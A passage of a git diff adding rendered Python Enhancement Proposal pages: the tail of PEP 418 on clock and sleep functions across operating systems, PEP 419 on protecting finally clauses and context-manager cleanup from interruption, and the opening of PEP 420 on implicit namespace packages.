timeGetTime() and timeBeginPeriod() are part the Windows multimedia +library and so require to link the program against winmm or to +dynamically load the library.

+
+
+
+

Solaris: CLOCK_HIGHRES

+

The Solaris OS has a CLOCK_HIGHRES timer that attempts to use an +optimal hardware source, and may give close to nanosecond resolution. +CLOCK_HIGHRES is the nonadjustable, high-resolution clock. For timers +created with a clockid_t value of CLOCK_HIGHRES, the system will +attempt to use an optimal hardware source.

+

The resolution of CLOCK_HIGHRES can be read using clock_getres().

+
+
+

Solaris: gethrtime

+

The gethrtime() function returns the current high-resolution real +time. Time is expressed as nanoseconds since some arbitrary time in +the past; it is not correlated in any way to the time of day, and thus +is not subject to resetting or drifting by way of adjtime() or +settimeofday(). The hires timer is ideally suited to performance +measurement tasks, where cheap, accurate interval timing is required.

+

The linearity of gethrtime() is not preserved across a suspend-resume +cycle (Bug 4272663).

+

Read the gethrtime() manual page of Solaris 11.

+

On Solaris, gethrtime() is the same as clock_gettime(CLOCK_MONOTONIC).

+
+
+
+

System Time

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC ResolutionInclude SleepInclude Suspend
CLOCK_REALTIME1 nsYesYes
CLOCK_REALTIME_COARSE1 nsYesYes
GetSystemTimeAsFileTime100 nsYesYes
gettimeofday()1 µsYesYes
ftime()1 msYesYes
time()1 secYesYes
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
CLOCK_REALTIMESunOS 5.1110 ms238 ns
CLOCK_REALTIMELinux 3.01 ns238 ns
gettimeofday()Mac OS 10.61 µs4 µs
CLOCK_REALTIMEFreeBSD 8.211 ns6 µs
CLOCK_REALTIMEOpenBSD 5.010 ms5 µs
CLOCK_REALTIME_COARSELinux 3.31 ms1 ms
CLOCK_REALTIME_COARSELinux 3.04 ms4 ms
GetSystemTimeAsFileTime()Windows Seven16 ms1 ms
ftime()Windows Seven-1 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

Windows: GetSystemTimeAsFileTime

+

The system time can be read using GetSystemTimeAsFileTime(), ftime() and +time(). The resolution of the system time can be read using +GetSystemTimeAdjustment().

+

Read the GetSystemTimeAsFileTime() documentation.

+

The system time can be set using SetSystemTime().

+
+
+

System time on UNIX

+

gettimeofday(), ftime(), time() and clock_gettime(CLOCK_REALTIME) return +the system time. The resolution of CLOCK_REALTIME can be read using +clock_getres().

+

The system time can be set using settimeofday() or +clock_settime(CLOCK_REALTIME).

+

Linux provides also CLOCK_REALTIME_COARSE since Linux 2.6.32. It is similar +to CLOCK_REALTIME, less precise but faster.

+

Alexander Shishkin proposed an API for Linux to be notified when the system +clock is changed: timerfd: add TFD_NOTIFY_CLOCK_SET to watch for clock changes (4th version of the API, March 2011). The +API is not accepted yet, but CLOCK_BOOTTIME provides a similar feature.

+
+
+
+

Process Time

+

The process time cannot be set. It is not monotonic: the clocks stop +while the process is idle.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC ResolutionInclude SleepInclude Suspend
GetProcessTimes()100 nsNoNo
CLOCK_PROCESS_CPUTIME_ID1 nsNoNo
getrusage(RUSAGE_SELF)1 µsNoNo
times()-NoNo
clock()-Yes on Windows, No otherwiseNo
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
CLOCK_PROCESS_CPUTIME_IDLinux 3.31 ns1 ns
CLOCK_PROFFreeBSD 8.210 ms1 µs
getrusage(RUSAGE_SELF)FreeBSD 8.2-1 µs
getrusage(RUSAGE_SELF)SunOS 5.11-1 µs
CLOCK_PROCESS_CPUTIME_IDLinux 3.01 ns1 µs
getrusage(RUSAGE_SELF)Mac OS 10.6-5 µs
clock()Mac OS 10.61 µs5 µs
CLOCK_PROFOpenBSD 5.0-5 µs
getrusage(RUSAGE_SELF)Linux 3.0-4 ms
getrusage(RUSAGE_SELF)OpenBSD 5.0-8 ms
clock()FreeBSD 8.28 ms8 ms
clock()Linux 3.01 µs10 ms
times()Linux 3.010 ms10 ms
clock()OpenBSD 5.010 ms10 ms
times()OpenBSD 5.010 ms10 ms
times()Mac OS 10.610 ms10 ms
clock()SunOS 5.111 µs10 ms
times()SunOS 5.111 µs10 ms
GetProcessTimes()Windows Seven16 ms16 ms
clock()Windows Seven1 ms1 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

Functions

+
    +
  • Windows: GetProcessTimes(). +The resolution can be read using GetSystemTimeAdjustment().
  • +
  • clock_gettime(CLOCK_PROCESS_CPUTIME_ID): High-resolution per-process +timer from the CPU. The resolution can be read using clock_getres().
  • +
  • clock(). The resolution is 1 / CLOCKS_PER_SEC.
      +
    • Windows: The elapsed wall-clock time since the start of the +process (elapsed time in seconds times CLOCKS_PER_SEC). Include +time elapsed during sleep. It can fail.
    • +
    • UNIX: returns an approximation of processor time used by the +program.
    • +
    +
  • +
  • getrusage(RUSAGE_SELF) returns a structure of resource usage of the currenet +process. ru_utime is user CPU time and ru_stime is the system CPU time.
  • +
  • times(): structure of process times. The resolution is 1 / ticks_per_seconds, +where ticks_per_seconds is sysconf(_SC_CLK_TCK) or the HZ constant.
  • +
+

Python source code includes a portable library to get the process time (CPU +time): Tools/pybench/systimes.py.

+

See also the QueryProcessCycleTime() function +(sum of the cycle time of all threads) and clock_getcpuclockid().

+
+
+
+

Thread Time

+

The thread time cannot be set. It is not monotonic: the clocks stop +while the thread is idle.

+ + + + + + + + + + + + + + + + + + + + +
NameC ResolutionInclude SleepInclude Suspend
CLOCK_THREAD_CPUTIME_ID1 nsYesEpoch changes
GetThreadTimes()100 nsNo?
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
CLOCK_THREAD_CPUTIME_IDFreeBSD 8.21 µs1 µs
CLOCK_THREAD_CPUTIME_IDLinux 3.31 ns649 ns
GetThreadTimes()Windows Seven16 ms16 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

Functions

+
    +
  • Windows: GetThreadTimes(). +The resolution can be read using GetSystemTimeAdjustment().
  • +
  • clock_gettime(CLOCK_THREAD_CPUTIME_ID): Thread-specific CPU-time +clock. It uses a number of CPU cycles, not a number of seconds. +The resolution can be read using of clock_getres().
  • +
+

See also the QueryThreadCycleTime() function +(cycle time for the specified thread) and pthread_getcpuclockid().

+
+
+
+

Windows: QueryUnbiasedInterruptTime

+

Gets the current unbiased interrupt time from the biased interrupt +time and the current sleep bias amount. This time is not affected by +power management sleep transitions.

+

The elapsed time retrieved by the QueryUnbiasedInterruptTime function +includes only time that the system spends in the working state. +QueryUnbiasedInterruptTime() is not monotonic.

+

QueryUnbiasedInterruptTime() was introduced in Windows 7.

+

See also QueryIdleProcessorCycleTime() function +(cycle time for the idle thread of each processor)

+
+
+

Sleep

+

Suspend execution of the process for the given number of seconds. +Sleep is not affected by system time updates. Sleep is paused during +system suspend. For example, if a process sleeps for 60 seconds and +the system is suspended for 30 seconds in the middle of the sleep, the +sleep duration is 90 seconds in the real time.

+

Sleep can be interrupted by a signal: the function fails with EINTR.

+ + + + + + + + + + + + + + + + + + + + + + + +
NameC Resolution
nanosleep()1 ns
clock_nanosleep()1 ns
usleep()1 µs
delay()1 µs
sleep()1 sec
+

Other functions:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC Resolution
sigtimedwait()1 ns
pthread_cond_timedwait()1 ns
sem_timedwait()1 ns
select()1 µs
epoll()1 ms
poll()1 ms
WaitForSingleObject()1 ms
+

The “C Resolution” column is the resolution of the underlying C +structure.

+
+

Functions

+ +
+
+

clock_nanosleep

+

clock_nanosleep(clock_id, flags, nanoseconds, remaining): Linux +manpage of clock_nanosleep().

+

If flags is TIMER_ABSTIME, then request is interpreted as an absolute +time as measured by the clock, clock_id. If request is less than or +equal to the current value of the clock, then clock_nanosleep() +returns immediately without suspending the calling thread.

+

POSIX.1 specifies that changing the value of the CLOCK_REALTIME clock +via clock_settime(2) shall have no effect on a thread that is blocked +on a relative clock_nanosleep().

+
+
+

select()

+

select(nfds, readfds, writefds, exceptfs, timeout).

+

Since Linux 2.6.28, select() uses high-resolution timers to handle the +timeout. A process has a “slack” attribute to configure the precision +of the timeout, the default slack is 50 microseconds. Before Linux +2.6.28, timeouts for select() were handled by the main timing +subsystem at a jiffy-level resolution. Read also High- (but not too +high-) resolution timeouts and +Timer slack.

+
+
+

Other functions

+
    +
  • poll(), epoll()
  • +
  • sigtimedwait(). POSIX: “If the Monotonic Clock option is supported, +the CLOCK_MONOTONIC clock shall be used to measure the time +interval specified by the timeout argument.”
  • +
  • pthread_cond_timedwait(), pthread_condattr_setclock(). “The default +value of the clock attribute shall refer to the system time.”
  • +
  • sem_timedwait(): “If the Timers option is supported, the timeout +shall be based on the CLOCK_REALTIME clock. If the Timers option is +not supported, the timeout shall be based on the system time as +returned by the time() function. The precision of the timeout +shall be the precision of the clock on which it is based.”
  • +
  • WaitForSingleObject(): use the same timer than GetTickCount() with +the same precision.
  • +
+
+
+
+
+

System Standby

+

The ACPI power state “S3” is a system standby mode, also called +“Suspend to RAM”. RAM remains powered.

+

On Windows, the WM_POWERBROADCAST message is sent to Windows +applications to notify them of power-management events (ex: owner status +has changed).

+

For Mac OS X, read Registering and unregistering for sleep and wake +notifications +(Technical Q&A QA1340).

+
+
+

Footnotes

+ +
+ +
+

Acceptance

+

The PEP was accepted on 2012-04-28 by Guido van Rossum [1]. The PEP +implementation has since been committed to the repository.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0418.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0419/index.html b/pep-0419/index.html new file mode 100644 index 00000000000..98ea5b02e3d --- /dev/null +++ b/pep-0419/index.html @@ -0,0 +1,635 @@ + + + + + + + + PEP 419 – Protecting cleanup statements from interruptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 419 – Protecting cleanup statements from interruptions

+
+
Author:
+
Paul Colomiets <paul at colomiets.name>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
06-Apr-2012
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a way to protect Python code from being interrupted +inside a finally clause or during context manager cleanup.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Rationale

+

Python has two nice ways to do cleanup. One is a finally +statement and the other is a context manager (usually called using a +with statement). However, neither is protected from interruption +by KeyboardInterrupt or GeneratorExit caused by +generator.throw(). For example:

+
lock.acquire()
+try:
+    print('starting')
+    do_something()
+finally:
+    print('finished')
+    lock.release()
+
+
+

If KeyboardInterrupt occurs just after the second print() +call, the lock will not be released. Similarly, the following code +using the with statement is affected:

+
from threading import Lock
+
+class MyLock:
+
+    def __init__(self):
+        self._lock_impl = Lock()
+
+    def __enter__(self):
+        self._lock_impl.acquire()
+        print("LOCKED")
+
+    def __exit__(self):
+        print("UNLOCKING")
+        self._lock_impl.release()
+
+lock = MyLock()
+with lock:
+    do_something
+
+
+

If KeyboardInterrupt occurs near any of the print() calls, the +lock will never be released.

+
+

Coroutine Use Case

+

A similar case occurs with coroutines. Usually coroutine libraries +want to interrupt the coroutine with a timeout. The +generator.throw() method works for this use case, but there is no +way of knowing if the coroutine is currently suspended from inside a +finally clause.

+

An example that uses yield-based coroutines follows. The code looks +similar using any of the popular coroutine libraries Monocle [1], +Bluelet [2], or Twisted [3].

+
def run_locked():
+    yield connection.sendall('LOCK')
+    try:
+        yield do_something()
+        yield do_something_else()
+    finally:
+        yield connection.sendall('UNLOCK')
+
+with timeout(5):
+    yield run_locked()
+
+
+

In the example above, yield something means to pause executing the +current coroutine and to execute coroutine something until it +finishes execution. Therefore, the coroutine library itself needs to +maintain a stack of generators. The connection.sendall() call waits +until the socket is writable and does a similar thing to what +socket.sendall() does.

+

The with statement ensures that all code is executed within 5 +seconds timeout. It does so by registering a callback in the main +loop, which calls generator.throw() on the top-most frame in the +coroutine stack when a timeout happens.

+

The greenlets extension works in a similar way, except that it +doesn’t need yield to enter a new stack frame. Otherwise +considerations are similar.

+
+
+
+

Specification

+
+

Frame Flag ‘f_in_cleanup’

+

A new flag on the frame object is proposed. It is set to True if +this frame is currently executing a finally clause. Internally, +the flag must be implemented as a counter of nested finally statements +currently being executed.

+

The internal counter also needs to be incremented during execution of +the SETUP_WITH and WITH_CLEANUP bytecodes, and decremented +when execution for these bytecodes is finished. This allows to also +protect __enter__() and __exit__() methods.

+
+
+

Function ‘sys.setcleanuphook’

+

A new function for the sys module is proposed. This function sets +a callback which is executed every time f_in_cleanup becomes +false. Callbacks get a frame object as their sole argument, so that +they can figure out where they are called from.

+

The setting is thread local and must be stored in the +PyThreadState structure.

+
+
+

Inspect Module Enhancements

+

Two new functions are proposed for the inspect module: +isframeincleanup() and getcleanupframe().

+

isframeincleanup(), given a frame or generator object as its sole +argument, returns the value of the f_in_cleanup attribute of a +frame itself or of the gi_frame attribute of a generator.

+

getcleanupframe(), given a frame object as its sole argument, +returns the innermost frame which has a true value of +f_in_cleanup, or None if no frames in the stack have a nonzero +value for that attribute. It starts to inspect from the specified +frame and walks to outer frames using f_back pointers, just like +getouterframes() does.

+
+
+
+

Example

+

An example implementation of a SIGINT handler that interrupts safely +might look like:

+
import inspect, sys, functools
+
+def sigint_handler(sig, frame):
+    if inspect.getcleanupframe(frame) is None:
+        raise KeyboardInterrupt()
+    sys.setcleanuphook(functools.partial(sigint_handler, 0))
+
+
+

A coroutine example is out of scope of this document, because its +implementation depends very much on a trampoline (or main loop) used +by coroutine library.

+
+
+

Unresolved Issues

+
+

Interruption Inside With Statement Expression

+

Given the statement

+
with open(filename):
+    do_something()
+
+
+

Python can be interrupted after open() is called, but before the +SETUP_WITH bytecode is executed. There are two possible +decisions:

+
    +
  • Protect with expressions. This would require another bytecode, +since currently there is no way of recognizing the start of the +with expression.
  • +
  • Let the user write a wrapper if he considers it important for the +use-case. A safe wrapper might look like this:
    class FileWrapper(object):
    +
    +    def __init__(self, filename, mode):
    +        self.filename = filename
    +        self.mode = mode
    +
    +    def __enter__(self):
    +        self.file = open(self.filename, self.mode)
    +
    +    def __exit__(self):
    +        self.file.close()
    +
    +
    +

    Alternatively it can be written using the contextmanager() +decorator:

    +
    @contextmanager
    +def open_wrapper(filename, mode):
    +    file = open(filename, mode)
    +    try:
    +        yield file
    +    finally:
    +        file.close()
    +
    +
    +

    This code is safe, as the first part of the generator (before yield) +is executed inside the SETUP_WITH bytecode of the caller.

    +
  • +
+
+
+

Exception Propagation

+

Sometimes a finally clause or an __enter__()/__exit__() +method can raise an exception. Usually this is not a problem, since +more important exceptions like KeyboardInterrupt or SystemExit +should be raised instead. But it may be nice to be able to keep the +original exception inside a __context__ attribute. So the cleanup +hook signature may grow an exception argument:

+
def sigint_handler(sig, frame)
+    if inspect.getcleanupframe(frame) is None:
+        raise KeyboardInterrupt()
+    sys.setcleanuphook(retry_sigint)
+
+def retry_sigint(frame, exception=None):
+    if inspect.getcleanupframe(frame) is None:
+        raise KeyboardInterrupt() from exception
+
+
+
+

Note

+

There is no need to have three arguments like in the __exit__ +method since there is a __traceback__ attribute in exception in +Python 3.

+
+

However, this will set the __cause__ for the exception, which is +not exactly what’s intended. So some hidden interpreter logic may be +used to put a __context__ attribute on every exception raised in a +cleanup hook.

+
+
+

Interruption Between Acquiring Resource and Try Block

+

The example from the first section is not totally safe. Let’s take a +closer look:

+
lock.acquire()
+try:
+    do_something()
+finally:
+    lock.release()
+
+
+

The problem might occur if the code is interrupted just after +lock.acquire() is executed but before the try block is +entered.

+

There is no way the code can be fixed unmodified. The actual fix +depends very much on the use case. Usually code can be fixed using a +with statement:

+
with lock:
+    do_something()
+
+
+

However, for coroutines one usually can’t use the with statement +because you need to yield for both the acquire and release +operations. So the code might be rewritten like this:

+
try:
+    yield lock.acquire()
+    do_something()
+finally:
+    yield lock.release()
+
+
+

The actual locking code might need more code to support this use case, +but the implementation is usually trivial, like this: check if the +lock has been acquired and unlock if it is.

+
+
+

Handling EINTR Inside a Finally

+

Even if a signal handler is prepared to check the f_in_cleanup +flag, InterruptedError might be raised in the cleanup handler, +because the respective system call returned an EINTR error. The +primary use cases are prepared to handle this:

+
    +
  • Posix mutexes never return EINTR
  • +
  • Networking libraries are always prepared to handle EINTR
  • +
  • Coroutine libraries are usually interrupted with the throw() +method, not with a signal
  • +
+

The platform-specific function siginterrupt() might be used to +remove the need to handle EINTR. However, it may have hardly +predictable consequences, for example SIGINT a handler is never +called if the main thread is stuck inside an IO routine.

+

A better approach would be to have the code, which is usually used in +cleanup handlers, be prepared to handle InterruptedError +explicitly. An example of such code might be a file-based lock +implementation.

+

signal.pthread_sigmask can be used to block signals inside +cleanup handlers which can be interrupted with EINTR.

+
+
+

Setting Interruption Context Inside Finally Itself

+

Some coroutine libraries may need to set a timeout for the finally +clause itself. For example:

+
try:
+    do_something()
+finally:
+    with timeout(0.5):
+        try:
+            yield do_slow_cleanup()
+        finally:
+            yield do_fast_cleanup()
+
+
+

With current semantics, timeout will either protect the whole with +block or nothing at all, depending on the implementation of each +library. What the author intended is to treat do_slow_cleanup as +ordinary code, and do_fast_cleanup as a cleanup (a +non-interruptible one).

+

A similar case might occur when using greenlets or tasklets.

+

This case can be fixed by exposing f_in_cleanup as a counter, and +by calling a cleanup hook on each decrement. A coroutine library may +then remember the value at timeout start, and compare it on each hook +execution.

+

But in practice, the example is considered to be too obscure to take +into account.

+
+
+

Modifying KeyboardInterrupt

+

It should be decided if the default SIGINT handler should be +modified to use the described mechanism. The initial proposition is +to keep old behavior, for two reasons:

+
    +
  • Most application do not care about cleanup on exit (either they do +not have external state, or they modify it in crash-safe way).
  • +
  • Cleanup may take too much time, not giving user a chance to +interrupt an application.
  • +
+

The latter case can be fixed by allowing an unsafe break if a +SIGINT handler is called twice, but it seems not worth the +complexity.

+
+
+
+

Alternative Python Implementations Support

+

We consider f_in_cleanup an implementation detail. The actual +implementation may have some fake frame-like object passed to signal +handler, cleanup hook and returned from getcleanupframe(). The +only requirement is that the inspect module functions work as +expected on these objects. For this reason, we also allow to pass a +generator object to the isframeincleanup() function, which removes +the need to use the gi_frame attribute.

+

It might be necessary to specify that getcleanupframe() must +return the same object that will be passed to cleanup hook at the next +invocation.

+
+
+

Alternative Names

+

The original proposal had a f_in_finally frame attribute, as the +original intention was to protect finally clauses. But as it grew +up to protecting __enter__ and __exit__ methods too, the +f_in_cleanup name seems better. Although the __enter__ method +is not a cleanup routine, it at least relates to cleanup done by +context managers.

+

setcleanuphook, isframeincleanup and getcleanupframe can +be unobscured to set_cleanup_hook, is_frame_in_cleanup and +get_cleanup_frame, although they follow the naming convention of +their respective modules.

+
+
+

Alternative Proposals

+
+

Propagating ‘f_in_cleanup’ Flag Automatically

+

This can make getcleanupframe() unnecessary. But for yield-based +coroutines you need to propagate it yourself. Making it writable +leads to somewhat unpredictable behavior of setcleanuphook().

+
+
+

Add Bytecodes ‘INCR_CLEANUP’, ‘DECR_CLEANUP’

+

These bytecodes can be used to protect the expression inside the +with statement, as well as making counter increments more explicit +and easy to debug (visible inside a disassembly). Some middle ground +might be chosen, like END_FINALLY and SETUP_WITH implicitly +decrementing the counter (END_FINALLY is present at end of every +with suite).

+

However, adding new bytecodes must be considered very carefully.

+
+
+

Expose ‘f_in_cleanup’ as a Counter

+

The original intention was to expose a minimum of needed +functionality. However, as we consider the frame flag +f_in_cleanup an implementation detail, we may expose it as a +counter.

+

Similarly, if we have a counter we may need to have the cleanup hook +called on every counter decrement. It’s unlikely to have much +performance impact as nested finally clauses are an uncommon case.

+
+
+

Add code object flag ‘CO_CLEANUP’

+

As an alternative to set the flag inside the SETUP_WITH and +WITH_CLEANUP bytecodes, we can introduce a flag CO_CLEANUP. +When the interpreter starts to execute code with CO_CLEANUP set, +it sets f_in_cleanup for the whole function body. This flag is +set for code objects of __enter__ and __exit__ special +methods. Technically it might be set on functions called +__enter__ and __exit__.

+

This seems to be less clear solution. It also covers the case where +__enter__ and __exit__ are called manually. This may be +accepted either as a feature or as an unnecessary side-effect (or, +though unlikely, as a bug).

+

It may also impose a problem when __enter__ or __exit__ +functions are implemented in C, as there is no code object to check +for the f_in_cleanup flag.

+
+
+

Have Cleanup Callback on Frame Object Itself

+

The frame object may be extended to have a f_cleanup_callback +member which is called when f_in_cleanup is reset to 0. This +would help to register different callbacks to different coroutines.

+

Despite its apparent beauty, this solution doesn’t add anything, as +the two primary use cases are:

+
    +
  • Setting the callback in a signal handler. The callback is +inherently a single one for this case.
  • +
  • Use a single callback per loop for the coroutine use case. Here, in +almost all cases, there is only one loop per thread.
  • +
+
+
+

No Cleanup Hook

+

The original proposal included no cleanup hook specification, as there +are a few ways to achieve the same using current tools:

+
    +
  • Using sys.settrace() and the f_trace callback. This may +impose some problem to debugging, and has a big performance impact +(although interrupting doesn’t happen very often).
  • +
  • Sleeping a bit more and trying again. For a coroutine library this +is easy. For signals it may be achieved using signal.alert.
  • +
+

Both methods are considered too impractical and a way to catch exit +from finally clauses is proposed.

+
+
+
+

References

+ +

[4] Original discussion + https://mail.python.org/pipermail/python-ideas/2012-April/014705.html

+

[5] Implementation of PEP 419 + https://github.com/python/cpython/issues/58935

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0419.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0420/index.html b/pep-0420/index.html new file mode 100644 index 00000000000..b20d52a6624 --- /dev/null +++ b/pep-0420/index.html @@ -0,0 +1,739 @@ + + + + + + + + PEP 420 – Implicit Namespace Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 420 – Implicit Namespace Packages

+
+
Author:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Apr-2012
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Namespace packages are a mechanism for splitting a single Python package +across multiple directories on disk. In current Python versions, an algorithm +to compute the packages __path__ must be formulated. With the enhancement +proposed here, the import machinery itself will construct the list of +directories that make up the package. This PEP builds upon previous work, +documented in PEP 382 and PEP 402. Those PEPs have since been rejected in +favor of this one. An implementation of this PEP is at [1].

+
+
+

Terminology

+

Within this PEP:

+
    +
  • “package” refers to Python packages as defined by Python’s import +statement.
  • +
  • “distribution” refers to separately installable sets of Python +modules as stored in the Python package index, and installed by +distutils or setuptools.
  • +
  • “vendor package” refers to groups of files installed by an +operating system’s packaging mechanism (e.g. Debian or Redhat +packages install on Linux systems).
  • +
  • “regular package” refers to packages as they are implemented in +Python 3.2 and earlier.
  • +
  • “portion” refers to a set of files in a single directory (possibly +stored in a zip file) that contribute to a namespace package.
  • +
  • “legacy portion” refers to a portion that uses __path__ +manipulation in order to implement namespace packages.
  • +
+

This PEP defines a new type of package, the “namespace package”.

+
+
+

Namespace packages today

+

Python currently provides pkgutil.extend_path to denote a package +as a namespace package. The recommended way of using it is to put:

+
from pkgutil import extend_path
+__path__ = extend_path(__path__, __name__)
+
+
+

in the package’s __init__.py. Every distribution needs to provide +the same contents in its __init__.py, so that extend_path is +invoked independent of which portion of the package gets imported +first. As a consequence, the package’s __init__.py cannot +practically define any names as it depends on the order of the package +fragments on sys.path to determine which portion is imported +first. As a special feature, extend_path reads files named +<packagename>.pkg which allows declaration of additional portions.

+

setuptools provides a similar function named +pkg_resources.declare_namespace that is used in the form:

+
import pkg_resources
+pkg_resources.declare_namespace(__name__)
+
+
+

In the portion’s __init__.py, no assignment to __path__ is +necessary, as declare_namespace modifies the package __path__ +through sys.modules. As a special feature, declare_namespace +also supports zip files, and registers the package name internally so +that future additions to sys.path by setuptools can properly add +additional portions to each package.

+

setuptools allows declaring namespace packages in a distribution’s +setup.py, so that distribution developers don’t need to put the +magic __path__ modification into __init__.py themselves.

+

See PEP 402’s “The Problem” +section for additional motivations +for namespace packages. Note that PEP 402 has been rejected, but the +motivating use cases are still valid.

+
+
+

Rationale

+

The current imperative approach to namespace packages has led to +multiple slightly-incompatible mechanisms for providing namespace +packages. For example, pkgutil supports *.pkg files; setuptools +doesn’t. Likewise, setuptools supports inspecting zip files, and +supports adding portions to its _namespace_packages variable, +whereas pkgutil doesn’t.

+

Namespace packages are designed to support being split across multiple +directories (and hence found via multiple sys.path entries). In +this configuration, it doesn’t matter if multiple portions all provide +an __init__.py file, so long as each portion correctly initializes +the namespace package. However, Linux distribution vendors (amongst +others) prefer to combine the separate portions and install them all +into the same file system directory. This creates a potential for +conflict, as the portions are now attempting to provide the same +file on the target system - something that is not allowed by many +package managers. Allowing implicit namespace packages means that the +requirement to provide an __init__.py file can be dropped +completely, and affected portions can be installed into a common +directory or split across multiple directories as distributions see +fit.

+

A namespace package will not be constrained by a fixed __path__, +computed from the parent path at namespace package creation time. +Consider the standard library encodings package:

+
    +
  1. Suppose that encodings becomes a namespace package.
  2. +
  3. It sometimes gets imported during interpreter startup to +initialize the standard io streams.
  4. +
  5. An application modifies sys.path after startup and wants to +contribute additional encodings from new path entries.
  6. +
  7. An attempt is made to import an encoding from an encodings +portion that is found on a path entry added in step 3.
  8. +
+

If the import system was restricted to only finding portions along the +value of sys.path that existed at the time the encodings +namespace package was created, the additional paths added in step 3 +would never be searched for the additional portions imported in step +4. In addition, if step 2 were sometimes skipped (due to some runtime +flag or other condition), then the path items added in step 3 would +indeed be used the first time a portion was imported. Thus this PEP +requires that the list of path entries be dynamically computed when +each portion is loaded. It is expected that the import machinery will +do this efficiently by caching __path__ values and only refreshing +them when it detects that the parent path has changed. In the case of +a top-level package like encodings, this parent path would be +sys.path.

+
+
+

Specification

+

Regular packages will continue to have an __init__.py and will +reside in a single directory.

+

Namespace packages cannot contain an __init__.py. As a +consequence, pkgutil.extend_path and +pkg_resources.declare_namespace become obsolete for purposes of +namespace package creation. There will be no marker file or directory +for specifying a namespace package.

+

During import processing, the import machinery will continue to +iterate over each directory in the parent path as it does in Python +3.2. While looking for a module or package named “foo”, for each +directory in the parent path:

+
    +
  • If <directory>/foo/__init__.py is found, a regular package is +imported and returned.
  • +
  • If not, but <directory>/foo.{py,pyc,so,pyd} is found, a module +is imported and returned. The exact list of extension varies by +platform and whether the -O flag is specified. The list here is +representative.
  • +
  • If not, but <directory>/foo is found and is a directory, it is +recorded and the scan continues with the next directory in the +parent path.
  • +
  • Otherwise the scan continues with the next directory in the parent +path.
  • +
+

If the scan completes without returning a module or package, and at +least one directory was recorded, then a namespace package is created. +The new namespace package:

+
    +
  • Has a __path__ attribute set to an iterable of the path strings +that were found and recorded during the scan.
  • +
  • Does not have a __file__ attribute.
  • +
+

Note that if “import foo” is executed and “foo” is found as a +namespace package (using the above rules), then “foo” is immediately +created as a package. The creation of the namespace package is not +deferred until a sub-level import occurs.

+

A namespace package is not fundamentally different from a regular +package. It is just a different way of creating packages. Once a +namespace package is created, there is no functional difference +between it and a regular package.

+
+

Dynamic path computation

+

The import machinery will behave as if a namespace package’s +__path__ is recomputed before each portion is loaded.

+

For performance reasons, it is expected that this will be achieved by +detecting that the parent path has changed. If no change has taken +place, then no __path__ recomputation is required. The +implementation must ensure that changes to the contents of the parent +path are detected, as well as detecting the replacement of the parent +path with a new path entry list object.

+
+
+

Impact on import finders and loaders

+

PEP 302 defines “finders” that are called to search path elements. +These finders’ find_module methods return either a “loader” object +or None.

+

For a finder to contribute to namespace packages, it must implement a +new find_loader(fullname) method. fullname has the same +meaning as for find_module. find_loader always returns a +2-tuple of (loader, <iterable-of-path-entries>). loader may +be None, in which case <iterable-of-path-entries> (which may +be empty) is added to the list of recorded path entries and path +searching continues. If loader is not None, it is immediately +used to load a module or regular package.

+

Even if loader is returned and is not None, +<iterable-of-path-entries> must still contain the path entries for +the package. This allows code such as pkgutil.extend_path() to +compute path entries for packages that it does not load.

+

Note that multiple path entries per finder are allowed. This is to +support the case where a finder discovers multiple namespace portions +for a given fullname. Many finders will support only a single +namespace package portion per find_loader call, in which case this +iterable will contain only a single string.

+

The import machinery will call find_loader if it exists, else fall +back to find_module. Legacy finders which implement +find_module but not find_loader will be unable to contribute +portions to a namespace package.

+

The specification expands PEP 302 loaders to include an optional method called +module_repr() which if present, is used to generate module object reprs. +See the section below for further details.

+
+
+

Differences between namespace packages and regular packages

+

Namespace packages and regular packages are very similar. The +differences are:

+
    +
